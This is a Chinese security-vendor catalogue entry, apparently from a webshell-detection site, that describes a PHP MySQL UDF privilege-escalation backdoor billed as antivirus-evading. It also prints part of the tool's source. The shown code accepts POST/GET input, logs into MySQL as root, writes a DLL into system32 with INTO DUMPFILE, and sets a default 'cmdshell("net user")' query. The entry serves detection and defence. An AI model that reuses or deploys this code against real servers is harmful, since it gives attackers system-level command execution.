UDF提权工具(免杀版)

2011-12-15 14:59:32 来源:本站原创,请勿转载 浏览:1037
UDF提权工具(免杀版)

木马名称:UDF提权工具(免杀版)
木马格式:php
默认密码:
木马作用:Mysql UDF 提权工具是一款针对PHP+Mysql服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的"cmdshell"函数,并且可以根据需要自定义函数其它函数。
运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:这是一个从MySQL突破来入侵服务器的php木马,危险.
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 UDF提权工具(免杀版) 这个php网页木马。

UDF提权工具(免杀版)部分代码

*/
error_reporting(0);
extract($_POST);
extract($_GET);
$action="mysql";
$mysql_hostname=$mysql_hostname?$mysql_hostname:"127.0.0.1";
$mysql_username=$mysql_username?$mysql_username:"root";
$post_sql=$post_sql?$post_sql:"select cmdshell(\"net user\")";
$mysql_dbname=$mysql_dbname?$mysql_dbname:"mysql";
$_SESSION['password']=$mysql_passwd;
if($install){   
 $link = mysql_connect ($mysql_hostname,$mysql_username,$_SESSION['password']) or die(mysql_error());
 mysql_select_db($mysql_dbname,$link) ; 
 @mysql_query("DROP TABLE udf_temp", $link);
 $query="CREATE TABLE udf_temp (udf BLOB);";
 if(!($result=mysql_query($query, $link)))
  die('错误:创建临时表udf_temp出错。'.mysql_error());
 else
 {
  $code=get_code();
  $query="INSERT into udf_temp values (CONVERT($code,CHAR));";
  if(!mysql_query($query, $link))
  {
   mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
   die('错误:插入DLL数据出错。'.mysql_error());
  }
  else
  {
   $dllname="mysqlDll.dll";
   if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
   elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
   
   if(file_exists($dir)) {
    $time=time();
    $dir=str_replace("mysqlDll","mysqlDll_$time",$dir);
    $dllname=str_replace("mysqlDll","mysqlDll_$time",$dllname);
   }

   $query="SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
   //echo $query;
   if(!mysql_query($query, $link))
   {
    //mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
    die("导出DLL文件出错:可能无权限或者 $dir 已经存在。".mysql_error());
   }
   else
   {
    echo 'DLL已成功的导出到'.$dir.'<br>';
   }
  }

(0)
(0)